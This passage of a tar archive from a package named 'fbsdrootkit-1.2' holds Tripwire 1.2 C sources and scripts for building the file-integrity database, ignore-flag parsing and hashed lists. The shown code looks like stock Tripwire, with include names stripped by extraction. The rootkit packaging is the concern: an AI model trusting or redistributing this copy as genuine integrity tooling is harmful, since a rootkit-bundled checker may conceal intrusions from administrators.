0; } return (!(*tc || *sc)); } fbsdrootkit-1.2/tripwire-1.2/src/dbase.build.c100600 764 764 35235 5614754431 16446 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: dbase.build.c,v 1.32 1994/07/25 15:24:09 gkim Exp $"; #endif /* * dbase.build.c * * build the preen.database file with the list of files that * was generated by config.parse.c * * Gene Kim * Purdue University * September 27, 1992 */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #if !defined(SYSV) || (SYSV > 3) # include #else # include #endif /* SYSV */ #include #include #include #ifndef NOGETTIMEOFDAY # include #else # include #endif /* NOGETTIMEOFDAY */ #ifdef DIRENT # include #else # ifndef XENIX # include # else /* XENIX */ # include # endif /* XENIX */ #endif /* DIRENT */ #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #ifdef STRINGH #include #else #include #endif #include "../include/list.h" #include "../include/tripwire.h" #if defined(SYSV) && (SYSV < 4) #ifndef HAVE_LSTAT # define lstat(x,y) stat(x,y) #endif #endif /* SYSV */ #ifndef SEEK_SET # define SEEK_SET L_SET #endif int files_scanned_num = 0; /* prototypes */ char *mktemp(); static void database_record_write(); char backupfile[MAXPATHLEN+256]; /* * database_build(struct list **pp_list, int tempdatabaseflag) * * take the list of file elements from the list and store all of * the pertinent inode and signature information in the database * file. * * if (tempdatabaseflag) is set, then we write to a private file * in the /tmp directory. */ extern int numinterupdated; void database_build (pp_list, mode, pp_entry_list) struct list **pp_list; int mode; struct list **pp_entry_list; { struct list_elem *p_fileentry; struct list_elem *p_configentry; FILE *fpw; char database[MAXPATHLEN+256]; int entrynum, oldumask; extern int errno; #ifndef NOGETTIMEOFDAY struct timezone tzone; struct timeval tval; #else time_t tval; #endif /* XENIX */ if (!quietmode) { fprintf(stderr, "### Phase 3: %s file information database\n", mode == DBASE_UPDATE ? "Updating" : "Creating"); } /* create the database file * if we are making the permanent database, then we write * to the specified file. * * else, we create a temporary file, and save the name of it. */ /* XXX - we should use open() so we can set the modes */ oldumask = umask(077); /* where do we write the new database? */ if (mode == DBASE_TEMPORARY) { char *tmpfilename = (char *) malloc(strlen(TEMPFILE_TEMPLATE)+1); if (tmpfilename == NULL) die_with_err("malloc() failed in database_build", (char *) NULL); (void) strcpy(tmpfilename, TEMPFILE_TEMPLATE); if ((char *) mktemp(tmpfilename) == NULL) die_with_err("database_build: mktemp()", (char *) NULL); (void) strcpy(tempdatabase_file, tmpfilename); (void) strcpy(database, tempdatabase_file); free(tmpfilename); } /* end if temporary database */ else if (mode == DBASE_UPDATE) { sprintf(database, "./databases/%s", database_file); } /* end if update mode */ else { sprintf(database, "%s/%s", database_path, database_file); } /* end if non-temporary database */ /* back up any existing database */ if (mode == DBASE_UPDATE) { FILE *fpin, *fpout; char backup[MAXPATHLEN+256]; char olddatabase[MAXPATHLEN+256]; register int ctemp; /* get a file descriptor to the old database, so we can open it * and make a backup copy */ if (specified_dbasemode) { if (!(fpin = (FILE *) fdopen(specified_dbasefd, "r"))) { die_with_err("database_build: Couldn't open database `%s':", olddatabase); } rewind(fpin); if (ftell(fpin) != 0) { die_with_err("database_build: ftell()", NULL); } if (specified_dbasemode == SPECIFIED_FILE) strcpy(olddatabase, specified_dbasefile); } else { /* what should we call the old database? */ sprintf(olddatabase, "%s/%s", database_path, database_file); if ((fpin = fopen(olddatabase, "r")) == NULL) { die_with_err("database_build: Couldn't open database `%s':", olddatabase); } } /* we hard code this, since we always want the new diretory placed * relative to our position */ sprintf(backupfile, "%s.old", database_file); /* make sure we stay underneath maximum file length */ if ((int)(strlen(database_file) + 4) > MAXNAMLEN) { /* tack on .old as well as it fits */ (void) strcpy(backup + (MAXNAMLEN - 4), ".old"); } /* so we can reference it later */ (void) sprintf(backup, "./databases/%s", backupfile); /* (void) strcpy(backupfile, backup); strlen(./Databases/) == 12 */ SPDEBUG(3) printf("database_build(): ---> olddatabase = (%s)\n", olddatabase); if ((fpout = fopen(backup, "w")) == NULL) die_with_err("Couldn't open '%s'!\n", backup); /* make the backup file */ while ((ctemp = getc(fpin)) != EOF) putc((char) ctemp, fpout); if (!specified_dbasemode) (void) fclose(fpin); (void) fclose(fpout); /* print banner (in case user stops program during database update) */ if (!quietmode) { fputs("###\n", stderr); fprintf(stderr, "### Old database file will be moved to `%s'\n", backupfile); fputs("### in ./databases.\n", stderr); fputs("###\n", stderr); fprintf(stderr, "### Updated database will be stored in '%s'\n", database); fprintf(stderr, "### (Tripwire expects it to be moved to '%s'.)\n", database_path); fputs("###\n", stderr); } } /* rebuild the database */ if ((fpw = fopen(database, "w")) == NULL) die_with_err("Hint: Maybe the database directory '%s' doesn't exist? fopen()", database); (void) umask(oldumask); /* get time information for banner */ #ifndef NOGETTIMEOFDAY if (gettimeofday(&tval, &tzone) < 0) die_with_err("gettimeofday()", (char *) NULL); #else tval = time((time_t *) 0); #endif /* XENIX */ /* add a banner to the top of the database file */ /* note that the newline comes from date */ { char timestring[30]; strncpy(timestring, ctime((time_t *)&tval), 26); fprintf(fpw, "# Generated by Tripwire, version %s on %s", version_num, timestring); fprintf(fpw, "@@dbaseversion %d\n", db_version_num); } /* we use &filelist as the key */ if (list_open(pp_list) < 0) die_with_err("database_build: list_open() failed!\n", (char *) NULL); while ((p_fileentry = list_get(pp_list)) != NULL) { struct stat statbuf; char filename[2048], ignorevec[512]; /* * if we're in UPDATE mode, we simply copy entries unless * FLAG_UPDATE is set. */ if (mode == DBASE_UPDATE) { int flagval; flagval = list_getflag(p_fileentry->varname, pp_list); if (!(flagval & FLAG_UPDATE)) { fprintf(fpw, "%s %s", filename_escape(p_fileentry->varname), p_fileentry->varvalue); SPDEBUG(10) printf("database_build(): --(dumping, flag=%d)--> %s\n", flagval, p_fileentry->varname); continue; } else { SPDEBUG(10) printf("database_build(): --(will update, flag=%d)--> %s\n", flagval, p_fileentry->varname); } } /* get the stat information on it */ strcpy(filename, p_fileentry->varname); if (sscanf(p_fileentry->varvalue, "%d %s", &entrynum, ignorevec) != 2) die_with_err("database_build: sscanf() parsing error!\n", (char *) NULL); if (lstat(filename, &statbuf) < 0) { if (errno == ENOENT) { fprintf(stderr, "%s: %s: disappeared. Skipping...\n", progname, filename); continue; } else die_with_err("database_build: lstat()", filename); } /* pick up NO_OPEN flag if we're in UPDATE mode * * if it is a special file or device, add it to the list, but * make sure we don't open it and read from it! */ if (mode == DBASE_UPDATE) switch (statbuf.st_mode & S_IFMT) { case S_IFIFO: case S_IFCHR: case S_IFDIR: case S_IFBLK: #if !defined(SYSV) || (SYSV > 3) #ifndef apollo /* Foolish Apollos define S_IFSOCK same as S_IFIFO in /bsd4.3/usr/include/sys/stat.h */ case S_IFSOCK: #endif #endif (void) list_setflag(filename, FLAG_NOOPEN, pp_list); break; #if !defined(SYSV) || (SYSV > 3) case S_IFLNK: /* if it's a symbolic link, make sure we flag it as such! */ (void) list_setflag(filename, FLAG_SYMLINK, pp_list); break; #endif } database_record_write(fpw, filename, p_fileentry->flag, ignorevec, &statbuf, entrynum); files_scanned_num++; } /* end while list_read() */ /* cleanup */ if (list_close(pp_list) < 0) die_with_err("database_build: list_close() failed!\n", (char *) NULL); /* print out table of contents in permanent database */ if (mode != DBASE_TEMPORARY) { /* we use &pp_entry_list as the key */ if (list_open(pp_entry_list) < 0) die_with_err("database_build: list_open() failed!\n", (char *) NULL); /* print out the contents */ while ((p_configentry = list_get(pp_entry_list)) != NULL) { char entry[2048]; int err; if ((err = sscanf(p_configentry->varvalue, "%s", entry)) != 1) { fprintf(stderr, "database_build: parse error (nfields=%d)!\n", err); fprintf(stderr, ">> %s\n", p_configentry->varvalue); exit(1); } /* skip those reverse index entries */ if (p_configentry->flag) continue; fprintf(fpw, "@@contents %s %s\n", filename_escape(p_configentry->varname), entry); SPDEBUG(10) printf("--(contents)-->%s\n", entry); } /* close the list */ if (list_close(pp_entry_list) < 0) die_with_err("database_build: list_close() failed!\n", (char *) NULL); } /* we don't want to allow anyone to spoof the temporary file in /tmp */ if (mode == DBASE_TEMPORARY) { if ((fptempdbase = freopen(database, "r", fpw)) == NULL) die_with_err("temporary database file disappeared?!?", database); rewind(fptempdbase); } else { fclose(fpw); } return; } /* * database_record_write(FILE *fpw, char *filename, int flags, * char *ignorevec, struct stat *statbuf, * int entrynum) * * write out the pertinent information of the specifed file to the * database. * * gather the signatures, and include that in the info going to * to the database. * * (entrynum) is the unique entry number tag from tw.config. */ static void database_record_write (fpw, filename, flags, ignorevec, statbuf, entrynum) FILE *fpw; char *filename; int flags; char *ignorevec; struct stat *statbuf; int entrynum; { static int fdsymlink = -1; /* to store contents of readlink() */ char sigs[NUM_SIGS][SIG_MAX_LEN]; int fd, i; int ignoremask; char vec64_a[50]; char vec64_c[50]; char vec64_m[50]; char sigs_concat[NUM_SIGS * SIG_MAX_LEN]; /* filename, entrynum, ignore, mode, inode, nlinks, uid, gid, size, * access, modify, ctime, {sig0, sig1, ..., sig9} */ static char *format = "%s %ld %s %lo %ld %ld %ld %ld %ld %s %s %s %s\n"; /* initialize our temporary file */ if (fdsymlink == -1) { fdsymlink = fd_tempfilename_generate(); } if (verbosity) { fprintf(stderr, "scanning: %s\n", filename); } /* * check for NOOPEN flag (for special files that shouldn't be * read from, like devices); we make up null signatures. */ if (flags & FLAG_NOOPEN) { for (i = 0; i < NUM_SIGS; i++) { register char *pc = sigs[i]; *pc++ = '0'; *pc++ = ' '; *pc++ = '\0'; } goto SKIPPED_SIGS; } /* * New for Tripwire v1.1.1: (adapted from Paul Szabo and Spaf) * * We open up symbolic links and store its signature in the database * Because I'm lazy, I open it, write it out to a temporary file * and feed it to the normal signature generation routines. */ #if !defined(SYSV) || (SYSV > 3) else if (flags & FLAG_SYMLINK) { char linkcontents[MAXPATHLEN+256]; int err, slen; if ((err = readlink(filename, linkcontents, sizeof(linkcontents))) < 0) { warn_with_err("couldn't read symbolic link for '%s'", filename); return; } /* Ensure null termination (may already have truncated string) */ /* * Some versions of readlink return null-terminated strings * (e.g. Apollo SR10.4) (but only if there is room); * some other versions do not bother (e.g. Apollo SR10.2). */ if (err < sizeof(linkcontents)) linkcontents[err] = '\0'; else linkcontents[sizeof(linkcontents)-1] = '\0'; slen = strlen(linkcontents); if (ftruncate(fdsymlink, 0) < 0) { die_with_err("truncate()", NULL); } if (lseek(fdsymlink, 0, SEEK_SET) < 0) { die_with_err("lseek()", NULL); } if ((err = write(fdsymlink, linkcontents, slen)) != slen) { warn_with_err("couldn't write symbolic link info for '%s'", filename); return; } } else { /* descriptor for signature functions */ if ((fd = open(filename, O_RDONLY)) < 0) { /* skip it if we had an error */ warn_with_err("Trying to open %s for signature", filename); return; } } #else /* descriptor for signature functions */ if ((fd = open(filename, O_RDONLY)) < 0) { /* skip it if we had an error */ warn_with_err("Trying to open %s for signature", filename); return; } #endif /* first find out which signatures we don't need to collect */ ignoremask = ignore_vec_to_scalar(ignorevec); /* collect signatures */ for (i = 0; i < NUM_SIGS; i++) { char *pc = sigs[i]; /* do we skip this signature? */ if ((ignoremask & (IGNORE_0 << i)) || (runtimeignore & (IGNORE_0 << i))) (void) strcpy(pc, "0 "); else { /* special file descriptor for those symbolic links */ if (flags & FLAG_SYMLINK) (*pf_signatures[i])(fdsymlink, pc, SIG_MAX_LEN); else (*pf_signatures[i])(fd, pc, SIG_MAX_LEN); (void) strcat(pc, " "); } } /* close up the descriptor, since we're done */ if (!(flags & FLAG_SYMLINK)) (void) close(fd); SKIPPED_SIGS: /* concatenate all the signature */ sigs_concat[0] = '\0'; for (i = 0; i < NUM_SIGS; i++) strcat(sigs_concat, sigs[i]); /* filename, ignore, mode, inode, nlinks, uid, gid, size, access, modify, * ctime, sig0, sig1, ..., sig9 */ SPDEBUG(6) printf("--(database_record_write)--> %s\n", filename); { time_t va = statbuf->st_atime, vm = statbuf->st_mtime, vc = statbuf->st_ctime; fprintf(fpw, format, filename_escape(filename), (int32)entrynum, ignorevec, (int32)statbuf->st_mode, (int32)statbuf->st_ino, (int32)statbuf->st_nlink, (int32)statbuf->st_uid, (int32)statbuf->st_gid, (int32)statbuf->st_size, pltob64((uint32 *) &va, (char *) vec64_a, 1), pltob64((uint32 *) &vm, (char *) vec64_m, 1), pltob64((uint32 *) &vc, (char *) vec64_c, 1), sigs_concat); } return; } fbsdrootkit-1.2/tripwire-1.2/src/dbase.update.c100600 764 764 6313 5612106414 16572 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: dbase.update.c,v 1.16 1994/07/17 01:44:44 gkim Exp $"; #endif /* * dbase.update.c * * build the preen.database file with the list of files that * was generated by config.parse.c * * Gene Kim * Purdue University */ #include "../include/config.h" #include #include #ifdef STDLIBH # include #endif #include #include #include #ifdef STRINGH #include #else #include #endif #include #include "../include/list.h" #include "../include/tripwire.h" #include /* * dbase_entry_flag () * * mark all entries with the given entrynumber (flagentry) with (orflag). * if (ignorevec) is non-NULL, then splice it in as the new ignore * vector. */ void dbase_entry_flag (pp_list, flagentry, orflag, ignorevec) struct list **pp_list; int flagentry; int orflag; char *ignorevec; { struct list_elem *p_fileentry; char trash[1024]; int entry; int err; /* use pp_list as key */ if (list_open(pp_list) < 0) { fputs("database_update: list_open() failed!\n", stderr); exit(1); } /* foreach file entry */ while ((p_fileentry = list_get(pp_list)) != NULL) { if ((err = sscanf(p_fileentry->varvalue, "%d %s", &entry, trash)) < 2) { fprintf(stderr, "dbase_entry_flag: sscanf() parse error, returned %d!\n", err); exit(1); } /* flag if entry number match */ if (entry == flagentry) { int flags, newflag; char pcname[MAXPATHLEN+1]; strcpy(pcname, p_fileentry->varname); /* exception list */ flags = list_getflag(pcname, pp_list); list_setflag(pcname, (orflag)|flags, pp_list); newflag = list_getflag(pcname, pp_list); SPDEBUG(3) fprintf(stderr, "dbase_entry_flag: found %s (entry=%d), oldflag=%d, newflag=%d\n", pcname, flagentry, flags, newflag); /* do we replace the ignorevector? */ if (ignorevec) { int entrynum; char oldignore[512], oldrest[2048]; char newvalue[2048]; /* parse the old dbase entry */ if ((err = sscanf(p_fileentry->varvalue, "%d %s %[^\n]", &entrynum, oldignore, oldrest)) != 3) { /* was it just added? */ if (list_getflag(pcname, pp_list) & FLAG_UPDATE) { SPDEBUG(3) printf("\t(it's already a newly file...)\n"); continue; } fprintf(stderr, "dbase_entry_flag: list parse error (nfields=%d)!\n", err); fprintf(stderr, "%s>> %s\n", pcname, p_fileentry->varvalue); exit(1); } /* splice the new ignore flag */ sprintf(newvalue, "%d %s %s\n", entrynum, ignorevec, oldrest); /* they should be the same, since ignorevecs are the only * things that changed */ assert(strlen(p_fileentry->varvalue) == strlen(newvalue)); list_set(pcname, newvalue, MAXPATHLEN+1, pp_list); } list_setflag(pcname, (orflag)|flags, pp_list); /* printf("%s: %d\n", pcname, flags); */ if (flags & FLAG_NOOPEN) { if (verbosity) fprintf(stderr, "%s is a special file! Skipping...\n", pcname); continue; } } } /* close up the list */ if (list_close(pp_list) < 0) { fputs("database_update: list_close() failed!\n", stderr); exit(1); } } fbsdrootkit-1.2/tripwire-1.2/src/help.sh100700 764 764 1113 5547660226 15362 0ustar dfdf#!/bin/sh # $Id: help.sh,v 1.5 1994/04/04 00:34:30 gkim Exp $ # # This file generates 'help.c' from the text in 'help.txt' # # Gene Kim # Purdue University # May 5, 1993 # if [ $# -ne 1 ] then echo 'help.sh: run this from the Makefile!' exit 1 fi # print out header of help.c cat < void tw_help_print(fp) FILE *fp; { EOF # wrap text from help.txt sed 's/ /\\t/g' < $1 | \ awk '!/^#/ { printf( "\tfprintf(fp, \"\t%s\\n\");\n", $0); }' # footer to help.c cat <>> START HERE <<< Inode information summary: ========================== st_mode: states the protection mode-bits that are associated with the file. (i.e., read, write, and execute permission bits). st_ino: the inode number, which uniquely labels the file within the filesystem. st_nlink: the number of links to a file which exist. (Adding a hard-link to a file or creates a subdirectory adds one to this number.) st_uid: the user-id of the file owner. st_gid: the group-id of the file owner. st_size: the size (in bytes) of the file. st_atime: the timestamp of the last file access. st_mtime: the timestamp of the last file modification. st_ctime: the timestamp of the last inode update. sig[0..9]: the 'fingerprint' yeilded by each signature routine. fbsdrootkit-1.2/tripwire-1.2/src/ignorevec.c100600 764 764 7154 5611466420 16225 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: ignorevec.c,v 1.13 1994/07/15 11:03:44 gkim Exp $"; #endif /* * ignorevec.c * * ignore-flag vector handling routines * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #ifdef STRINGH #include #else #include #endif #include #ifdef __STDC__ /* pick up all the structure prototypes */ #include #include #endif #include "../include/list.h" #include "../include/tripwire.h" /* * ignore_vec_to_scalar(char *s) * * take an ignore vector, and return an integer composed of OR'ed * ignore flags. */ int ignore_vec_to_scalar (s) char *s; { register int retval = 0; retval = (int) b64tol (s); SPDEBUG (10) printf ("ignore_vec_to_scalar (%s) --> %x\n", s, retval); return retval; } /* * ignore_configvec_to_dvec(char *s) * * convert a configuration-style ignore vector to the format we use in * database files. */ #define MASKIT(mask) if (ignorethis) {ignoremask |= (mask);} \ else {ignoremask = ignoremask & (~mask);} void ignore_configvec_to_dvec (s) char *s; { char dvec[128]; int ignoremask = 0, ignorethis = 0; char *pc; uint32 l; /* * where ignore-flags are in the format: * * [ [N|R|L] [ [-|+][p|i|n|u|g|s|a|m|c|0|1|2|3|4|5|6|7|8|9] ] ] * (template) (modifier) * * Templates: (default) N : Nothing (+pinusgsamc0123456789) * R : Read-only (N-a) * L : Log (N-samc0123456789) * E : Everything (-pnugsamci0123456789) */ /* walk through the ignore vector */ for (pc = s; *pc; pc++) { /* look for template */ switch (*pc) { case 'E': ignoremask = IGNORE_P | IGNORE_N | IGNORE_U | IGNORE_G | IGNORE_S | IGNORE_A | IGNORE_M | IGNORE_C | IGNORE_I | IGNORE_0_9; break; case 'L': ignoremask = IGNORE_S | IGNORE_A | IGNORE_M | IGNORE_C | IGNORE_0_9; break; case 'N': ignoremask = 0; break; case 'R': ignoremask = IGNORE_A | IGNORE_3 | IGNORE_4 | IGNORE_5 | IGNORE_6 | IGNORE_7 | IGNORE_8 | IGNORE_9; break; case '>': ignoremask = IGNORE_S | IGNORE_A | IGNORE_M | IGNORE_C | IGNORE_0_9 | IGNORE_GROW; break; default: goto NEXTPLACE; } } NEXTPLACE: for (; *pc; pc++) { switch (*pc) { case '+': ignorethis = 0; break; case '-': ignorethis = 1; break; case 'p': MASKIT (IGNORE_P); break; case 'i': MASKIT (IGNORE_I); break; case 'n': MASKIT (IGNORE_N); break; case 'u': MASKIT (IGNORE_U); break; case 'g': MASKIT (IGNORE_G); break; case 's': MASKIT (IGNORE_S); break; case 'a': MASKIT (IGNORE_A); break; case 'm': MASKIT (IGNORE_M); break; case 'c': MASKIT (IGNORE_C); break; case '0': MASKIT (IGNORE_0); break; case '1': MASKIT (IGNORE_1); break; case '2': MASKIT (IGNORE_2); break; case '3': MASKIT (IGNORE_3); break; case '4': MASKIT (IGNORE_4); break; case '5': MASKIT (IGNORE_5); break; case '6': MASKIT (IGNORE_6); break; case '7': MASKIT (IGNORE_7); break; case '8': MASKIT (IGNORE_8); break; case '9': MASKIT (IGNORE_9); break; default: fprintf (stderr, "%s: configuration parse error: illegal flag ('%c' in '%s')\n", progname, *pc, s); exit (1); } } /* now turn it into a string that we can interpolate */ l = ignoremask; (void) pltob64 (&l, (char *) dvec, 1); SPDEBUG (10) printf ("ignore_configvec_to_dvec: (%s) --> (%s)\n", s, dvec); (void) strcpy (s, dvec); return; } fbsdrootkit-1.2/tripwire-1.2/src/list.c100600 764 764 41020 5612102721 15215 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: list.c,v 1.14 1994/07/17 01:13:53 gkim Exp $"; #endif /* * list.c * * generic linked list routines. * * These routines generally use a (struct list **) as an argument * (ie: a pointer to a pointer to the head of the list). This way, * a NULL list pointer will automatically be malloc()'d into existence. * * These routines started as extremely simple routines. Unfortunately, the * O(n) search times made Tripwire extremely slow. So, v3.1 of * the linked list routines incorporate a hash table into each of * the list structures. *whew* It's faster, but it's not simple * anymore. (The addition of back pointers didn't help either...) * * Why? Well, we need to preserve order for the list of generated files. * So, a hash table won't do, and a simple linked list is too slow. * * Gene Kim * Purdue University * * March 1994 - Reworked to fix various bugs. * Paul Hilchey, UBC, hilchey@ucs.ubc.ca * ********** testing schedule ************ * * hashtable size = 1 * num records = 500 OK * * hashtable size = 1 * num records = 2000 OK * * hashtable size = 6007 * num records = 50 OK * * hashtable size = 6007 * num records = 3000 OK * * hashtable size = 6007 * num records = 8000 OK * * hashtable size = 6007 * num records = 20000 * * ghk -- 03/20/94 */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #include #ifdef MALLOCH # include #endif #ifdef STRINGH #include #else #include #endif #include "../include/list.h" /* prototypes */ static unsigned int string_hash (); static int listdebug = 0; #define LISTDEBUG(x) if (listdebug >= (x)) /* * list_set(pc_name, pc_value, priority, pp_list) * * insert structure with (name=pc_name) and (value=pc_value) * into the specified list */ void list_set(pc_name, pc_value, priority, pp_list) int priority; char *pc_name, *pc_value; struct list **pp_list; { struct list_elem *p, *sp, **q, **chain; int i, foundit; int namesize, valuesize; char *saved_pcname = NULL; /* were we handed a NULL list pointer? */ if (*pp_list == NULL) { /* malloc hash table */ if (NULL == (*pp_list = (struct list *)malloc(sizeof(struct list)))) { fprintf(stderr, "list_insert(): malloc() failed!\n"); exit(1); } /* initialize it */ for (i=0; ihashtable[i] = (struct list_elem *)NULL; (*pp_list)->p_head = (*pp_list)->p_tail = (*pp_list)->p_curr = (struct list_elem *)NULL; } /* chain points to the pointer to the first element in the chain */ chain = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* * 1) if pc_name is already in the list, then we compare priority * levels. replace only if new priority is higher than * existing priority. * * 2) if pc_name is not on the list, then we just add it to the * end of the list */ namesize = strlen(pc_name) + 1; /* +1 for the terminating \0 */ valuesize = strlen(pc_value) + 1; foundit = 0; /* walk through hash chain: p -> current element, q -> the link pointing to p */ for (p = *chain, q = chain; p; q = &(p->cnext), p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { /* * if existing priority is equal or less than this one, * then go ahead and clobber it. */ LISTDEBUG(10) fprintf(stderr, "list_set(): '%s' variable already found..\n", pc_name); if (p->priority <= priority) { LISTDEBUG(10) fprintf(stderr, "list_set(): Clobbering...\n"); foundit = 1; break; } /* existing priority is higher so do nothing */ return; } } if (foundit) { /* p -> found node; q points to pointer to p */ /* reallocate it and update links as needed */ sp = p; /* bad things happen if (pc_name) is freed by realloc(). so, we * detect this situation, and save a copy. */ if (pc_name == (char *)p + sizeof(struct list_elem)) { if (!(saved_pcname = malloc(namesize))) { fprintf(stderr, "list_insert(): malloc() failed!\n"); exit(1); } strcpy(saved_pcname, pc_name); } p = (struct list_elem *) realloc(p, sizeof(struct list_elem) + namesize + valuesize); if (p == NULL) { fprintf(stderr, "list_insert(): realloc() failed!\n"); exit(1); } /* update pointers only if it moved */ if (sp != p) { if (p->next) p->next->prev = p; if (p->prev) p->prev->next = p; (*q) = p; if (sp == (*pp_list)->p_tail) (*pp_list)->p_tail = p; if (sp == (*pp_list)->p_head) (*pp_list)->p_head = p; if (sp == (*pp_list)->p_curr) (*pp_list)->p_curr = p; } } else { /* create new element */ if ((p = (struct list_elem *) malloc(sizeof(struct list_elem) + namesize + valuesize)) == NULL) { fprintf(stderr, "list_insert(): malloc() failed!\n"); exit(1); } /* link it onto list and hash chain */ p->next = NULL; p->prev = (*pp_list)->p_tail; if (p->prev) p->prev->next = p; else (*pp_list)->p_head = p; (*pp_list)->p_tail = p; p->cnext = *chain; *chain = p; } /* fill in data fields */ p->varname = (char *)p + sizeof(struct list_elem); if (!saved_pcname) (void) strcpy(p->varname, pc_name); else { (void) strcpy(p->varname, saved_pcname); free(saved_pcname); } if (!foundit) { p->flag = 0; p->priority = priority; } p->varvalue = p->varname + namesize; (void) strcpy(p->varvalue, pc_value); return; } /* * char * * list_lookup(pc_name, pp_list) * * return the string value assigned to the environment value named * pc_name in the specified list. * * you must copy the contents of the (char *). */ char * list_lookup(pc_name, pp_list) char *pc_name; struct list **pp_list; { struct list_elem *p, **q; char *s; /* * 1) if *pp_list is NULL, then we know it's emtpy * 2) if it's not in the hash table, then return NULL * 3) search hash table chain */ /* check for empty list */ if (*pp_list == NULL) { return NULL; } q = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* now search through hash chain */ for (p = *q; p; p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { s = p->varvalue; return s; } } return NULL; } /* * int * list_isthere(pc_name, pp_list) * * returns (1) if pc_name is in the specified list. * else returns (0). */ int list_isthere(pc_name, pp_list) char *pc_name; struct list **pp_list; { struct list_elem *p, **q; /* * 1) if *pp_list is NULL, then we know it's emtpy * 3) search hash table chain */ /* check for empty list */ if (*pp_list == NULL) { return 0; } q = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* now search through hash chain */ for (p = *q; p; p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { return 1; } } return 0; } /* * list_unset(pc_name, pp_list) * remove the list entry with (varname == pcname) from the * environment */ void list_unset(pc_name, pp_list) char *pc_name; struct list **pp_list; { struct list_elem *p, **q; if (*pp_list == NULL) return; /* * 1) if pc_name isn't found in the hash chain, return * 2) if found, remove the element from the list, and then remove * from hash chain. */ /* look in hash table */ q = &(((*pp_list)->hashtable)[string_hash(pc_name)]); /* find the element, but playing pointer tag w/two pointers */ for (p = *q; p; q = &(p->cnext), p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { /* remove the element from the list */ /* are we at the head of the list? */ if (p->prev) p->prev->next = p->next; else (*pp_list)->p_head = p->next; /* are we at the end of the list? */ if (p->next) p->next->prev = p->prev; else (*pp_list)->p_tail = p->prev; /* are we the current item? */ if (p == (*pp_list)->p_curr) (*pp_list)->p_curr = p->next; /* now remove from hash chain */ *q = p->cnext; free((char *) p); return; } } } /* * list_setflag(pc_name, flag, pp_list) * * OR the the specified flag to the existing flag value. */ int list_setflag(pc_name, flag, pp_list) char *pc_name; int flag; struct list **pp_list; { struct list_elem *p, **q; if (*pp_list == NULL) return -1; /* * 1) look in hash table for entry. if not found, return with error. * 2) walk down hash chain until entry is found, then modify the * list entry */ q = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* walk down chain */ for (p = *q; p; p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { p->flag |= flag; return 0; } } return 0; } /* * list_getflag(pc_name, pp_list) * return the flag value embedded in structure. */ int list_getflag(pc_name, pp_list) char *pc_name; struct list **pp_list; { struct list_elem *p, **q; if (*pp_list == NULL) return -1; /* * 1) look in hash table for entry. if not found, return with error. * 2) walk down hash chain until entry is found, then modify the * list entry */ q = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* walk down chain */ for (p = *q; p; p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { return p->flag; } } return -1; } /* * list_print() * print out the entire contents of the linked list */ void list_print(pp_list) struct list **pp_list; { struct list_elem *p; struct list_elem *head; /* check to see if list is empty */ if (*pp_list == NULL) return; head = (*pp_list)->p_head; /* walk down entire list */ for (p = head; p; p = p->next) { /* printf("%-40s\t%20s %d\n", p->varname, p->varvalue, p->flag); */ printf("(%s) %20s %d\n", p->varname, p->varvalue, p->flag); } return; } /* * list_reset() * * given a pointer to a list, delete the entire list, and set the * pointer to NULL; */ void list_reset (pp_list) struct list **pp_list; { struct list_elem *p, *q; if (*pp_list == NULL) return; /* walk down the list, deleting the element that we just came from */ for (p = (*pp_list)->p_head; p; q = p, p = p->next, free((char *) q)) ; /* now free up the list structure */ free((char *) *pp_list); /* now invalidate the list structure pointer */ *pp_list = NULL; return; } /* * list_init () * list_open (struct list **pp_list) * list_get (struct list **pp_list) * list_close(struct list **pp_list) * * this allows the retrieval of individual list elements through * successive calls to list_get(). * * 0) list_init() no-op * 1) list_open() sets the current pointer to the first element * 2) any calls to list_get() will get the next element. * 3) list_close() clears current pointer */ int list_init() { return 0; } /* * list_open(struct list **pp_list) * * reset current pointer to start of list */ int list_open (pp_list) struct list **pp_list; { /* is the list NULL? */ if (*pp_list == NULL) { return 0; /* we'll fake it later on */ } (*pp_list)->p_curr = (*pp_list)->p_head; return 0; } /* * struct list_elem * * list_get(struct list **pp_list) * * get the next entry in the specified list (using *pp_list as the key), * and bump the internal pointer to the next element, ready * for the next call to list_get(). * we return NULL if we're sitting on the tail end of the list. */ struct list_elem * list_get (pp_list) struct list **pp_list; { struct list_elem *p; /* fake it if you pass it a NULL */ if (*pp_list == NULL) { return NULL; } p = (*pp_list)->p_curr; if (p) (*pp_list)->p_curr = p->next; return (p); } /* * list_close(struct list **pp_list) * */ int list_close (pp_list) struct list **pp_list; { /* fake it if you pass it a NULL */ if (*pp_list == NULL) { return 0; } (*pp_list)->p_curr = NULL; return 0; } static unsigned int string_hash (string) char *string; { unsigned int hindex; char *pc = string; hindex = *pc; while (*pc) { hindex = ((hindex << 9) ^ *pc++) % LIST_HASHSZ; /* hindex = ((hindex << 7) | (string[i] + len)) % LIST_HASHSZ; */ } return hindex; } #ifdef TEST main() { char s[1024]; struct list *list = (struct list *) NULL; FILE *fpin; struct list_elem *p; int i, count, total[11]; #define X1 #ifdef X1 if (!(fpin = fopen("/tmp/x", "r"))) { perror("fopen()"); exit(1); } while (fgets(s, 1024, fpin) != 0) { s[strlen(s)-1] = 0; list_set(s, "", 0, &list); if (!list_lookup("/scr/genek/mush/expr.c", &list)) { printf("Yikes! (%s)\n", s); } } fseek(fpin, 0, 0); while (fgets(s, 1024, fpin) != 0) { s[strlen(s)-1] = 0; list_set(s, "x", 0, &list); if (!list_lookup("/scr/genek/mush/expr.c", &list)) { printf("Yikes! 